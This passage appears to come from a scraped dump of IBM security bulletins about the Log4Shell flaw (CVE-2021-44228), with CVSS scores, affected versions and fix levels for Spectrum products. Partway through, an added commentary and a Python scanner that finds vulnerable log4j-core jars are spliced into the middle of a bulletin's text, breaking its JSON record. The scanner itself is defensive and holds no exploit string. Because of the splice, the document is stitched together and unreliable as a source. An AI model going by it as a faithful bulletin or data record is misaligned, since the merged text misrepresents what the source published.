Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nReview the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU010\",\"label\":\"Systems - Storage\"},\"Product\":{\"code\":\"STDJ4J\",\"label\":\"IBM Spectrum Copy Data Management\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"2.2\",\"Edition\":\"\"}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-21T09:15:04", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Log4j affects IBM Spectrum Copy Data Management (CVE-2021-44228)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T09:15:04", "id": "889513D802A76507558C54C040010996613C8881A261DD9C7C561CA24A30140B", "href": 
"https://www.ibm.com/support/pages/node/6527830", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-01T01:46:20", "description": "## Summary\n\nA vulnerability in Apache Log4j could allow an attacker to execute arbitrary code on the system. This vulnerability may affect the IBM Spectrum Protect Client Web GUI and IBM Spectrum Protect for Virtual Environments due to their uses of Log4j for logging of messages and traces. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Spectrum Protect Backup-Archive Client - see Note 1| \n\n8.1.11.0-8.1.13.0 \n7.1.8.10-7.1.8.12 \n \n \nIBM Spectrum Protect for Virtual Environments: Data Protection for VMware| 8.1.11.0-8.1.13.0 see Note 2 \n7.1.8.10-7.1.8.12 \nIBM Spectrum Protect for Virtual Environments: Data Protection for Hyper-V| 8.1.11.0-8.1.13.0 see Note 2 \n \n \nNote 1: The IBM Spectrum Protect Backup-Archive Client installs the affected log4j files. 
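Every remediation section above comes down to "upgrade to the level whose fix package carries a patched Log4j", and the Spectrum Protect bulletin's Note 1 makes the practical point that a product can install the affected log4j files even though only one component (the Web GUI) uses them. Before and after applying a fix package, a practitioner wants an inventory: which archives on the box contain log4j-core, at what version, and whether `JndiLookup.class` is in them at all, including jars nested inside .war and .ear files. The scanner below is an added example written for this page, not IBM's tooling or anything shipped with these products. It assumes the version facts for this CVE (first fixed releases 2.15.0 and, on the Java 7 branch, 2.12.2; the 2.3.x Java 6 backport line is simply treated as vulnerable), reads the version from Maven's `pom.properties` inside the jar, and builds its sample .war in memory with placeholder class bytes so it runs offline.

```python
"""Inventory check: find log4j-core inside jar/war/ear files and flag versions
that predate the CVE-2021-44228 fix.

Added example, not IBM's tooling. Assumed facts: the first log4j-core releases
fixing CVE-2021-44228 are 2.15.0 and, on the Java 7 branch, 2.12.2; the Java 6
backport line (2.3.x) is treated as vulnerable. Presence of the jar is static
evidence only; whether a component actually logs attacker-controlled input
through it is a separate, per-component question.
"""
import io
import os
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    path: str               # e.g. "app.war!/WEB-INF/lib/log4j-core-2.14.1.jar"
    version: Optional[str]  # None when no log4j-core pom.properties was found
    has_jndi_lookup: bool
    vulnerable: bool


def parse_version(v: str) -> Optional[tuple]:
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", v)   # "2.0-beta9" -> (2, 0, 0)
    return None if not m else tuple(int(x or 0) for x in m.groups())


def is_vulnerable_44228(version: Optional[str]) -> bool:
    """True for log4j-core 2.x releases before the fix (2.15.0 / 2.12.2)."""
    t = parse_version(version or "")
    if t is None or t[0] != 2:
        return False  # 1.x or unparsable: not this CVE, review separately
    _, minor, patch = t
    if minor == 12:
        return patch < 2
    return minor < 15


def _version_from_pom_properties(data: bytes) -> Optional[str]:
    for line in data.decode("utf-8", "replace").splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def scan_archive(blob: bytes, path: str) -> List[Finding]:
    """Recurse through nested archives; one Finding per archive carrying log4j-core."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(blob))
    except zipfile.BadZipFile:
        return []
    findings: List[Finding] = []
    with zf:
        names = set(zf.namelist())
        version = _version_from_pom_properties(zf.read(POM_PROPS)) if POM_PROPS in names else None
        has_cls = JNDI_LOOKUP_CLASS in names
        if version is not None or has_cls:
            # A shaded jar can carry JndiLookup.class without pom.properties;
            # with no version to go on, treat it as vulnerable until reviewed.
            vuln = is_vulnerable_44228(version) if version is not None else has_cls
            findings.append(Finding(path, version, has_cls, vuln))
        for name in sorted(names):
            if name.lower().endswith(ARCHIVE_SUFFIXES):
                findings.extend(scan_archive(zf.read(name), f"{path}!/{name}"))
    return findings


def scan_tree(root: str) -> List[Finding]:
    """Scan every archive under a directory on disk (for example an install root)."""
    out: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_SUFFIXES):
                full = os.path.join(dirpath, f)
                with open(full, "rb") as fh:
                    out.extend(scan_archive(fh.read(), full))
    return out


def _make_jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_war() -> bytes:
    """Constructed sample: a .war bundling an old and a fixed log4j-core
    (class entries are placeholder bytes, not real bytecode)."""
    old_core = _make_jar({POM_PROPS: b"version=2.14.1\nartifactId=log4j-core\n",
                          JNDI_LOOKUP_CLASS: b"\xca\xfe\xba\xbe"})
    new_core = _make_jar({POM_PROPS: b"version=2.17.0\nartifactId=log4j-core\n",
                          JNDI_LOOKUP_CLASS: b"\xca\xfe\xba\xbe"})
    other = _make_jar({"META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n"})
    return _make_jar({"WEB-INF/lib/log4j-core-2.14.1.jar": old_core,
                      "WEB-INF/lib/commons-io.jar": other,
                      "WEB-INF/lib/log4j-core-2.17.0.jar": new_core})


if __name__ == "__main__":
    for f in scan_archive(build_sample_war(), "app.war"):
        print(f"{'VULNERABLE' if f.vulnerable else 'ok':10} {f.version or '?':8} {f.path}")
```

The version from `pom.properties` is authoritative when present; `JndiLookup.class` on its own is not, because patched 2.x releases still ship that class. The class check earns its place for the opposite case: a relocated or shaded copy with no Maven metadata, which the scanner reports as needing review rather than silently passing.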
However, only the Web GUI will use the affected log4j files.\n\nNote 2: The Data Movers in 8.1.11 and above are affected\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing this vulnerability now by upgrading to the fixed level instead of using the manual process described under Workarounds and Mitigations.\n\n**Note: The below fix packages included Log4j 2.15.**\n\n**_IBM Spectrum Protect Client Affected Versions \n_**| **_Fixing \nLevel_**| **_Platform_**| **_Link to Fix and Instructions \n_** \n---|---|---|--- \n8.1.11.0-8.1.13.0 | 8.1.13.1| AIX \nLinux \nWindows| <https://www.ibm.com/support/pages/node/589103> \n7.1.8.10-7.1.8.12| \n\n7.1.8.13\n\n| Linux \nWindows| \n\n<https://www.ibm.com/sup